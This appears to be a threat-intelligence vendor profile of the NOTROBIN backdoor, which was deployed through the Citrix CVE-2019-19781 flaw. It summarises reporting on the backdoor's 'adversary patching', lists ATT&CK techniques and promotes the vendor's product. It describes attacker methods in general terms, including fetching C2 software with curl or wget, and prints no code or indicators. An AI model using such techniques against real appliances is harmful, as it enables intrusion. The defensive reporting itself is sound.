NOTROBIN
NOTROBIN is a malware payload/backdoor associated with exploitation of Citrix ADC/Gateway appliances vulnerable to CVE-2019-19781. Multiple sources in the provided content state that threat actors actively targeted vulnerable Citrix installations and used NOTROBIN after gaining access via this unauthenticated remote code execution flaw. FireEye reported that actors installed NOTROBIN and also performed mitigation steps intended to block subsequent exploitation by other attackers. The content further describes this as a form of adversary patching: NOTROBIN removed competing web shells and altered components so that only the intruder with a secret key could regain access. The malware is explicitly described as a backdoor trojan and is also listed among notable Linux malware discoveries. High-confidence context ties it to Citrix NetScaler/ADC exploitation waves in 2020, affecting internet-facing enterprise and government environments using vulnerable Citrix appliances. The provided content does not include specific file hashes, domains, or other concrete IOCs for NOTROBIN.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products... The vulnerability has been assigned CVE ID CVE-2019-19781... Meanwhile, according to FireEye research threat actors were actively targeting vulnerable Citrix installations to install malware... The payload used by the threat actor is named NOTROBIN... By the end of January 2020, Citrix has released patches for all products... At the time of writing several exploits have already been released to the public. | Meanwhile, according to FireEye research threat actors were actively targeting vulnerable Citrix installations to install malware and perform the mitigation steps to prevent subsequent exploitation attempts. The payload used by the threat actor is named NOTROBIN.
Techniques & procedures
5 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
“Cyber actors continue to exploit publicly known—and often dated—software vulnerabilities… Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies.” / “CVE-2019-19781… exploitation enables the actors to perform unauthorized RCE on a target system.”
Execution
2 techniques
Execution
Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g., curl, wget, Invoke-WebRequest).
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products... Exploiting the vulnerability could allow an unauthenticated attacker to perform arbitrary code execution on the Citrix appliance.
Persistence
1 technique
Persistence
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Backdoor observed in the Citrix NetScaler/ADC CVE-2019-19781 exploitation wave; removes competing webshells and modifies components to allow only the operator (with a secret key) to re-enter, leaving systems appearing patched but still compromised.
Named malware/tool referenced in the content without additional description.
Backdoor malware targeting Linux servers, known for removing competing malware and maintaining persistence.
NOTROBIN is a payload deployed on vulnerable Citrix systems after exploitation of CVE-2019-19781. In the described context, it was installed by threat actors on compromised Citrix appliances and used to block or prevent subsequent exploitation attempts by others.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.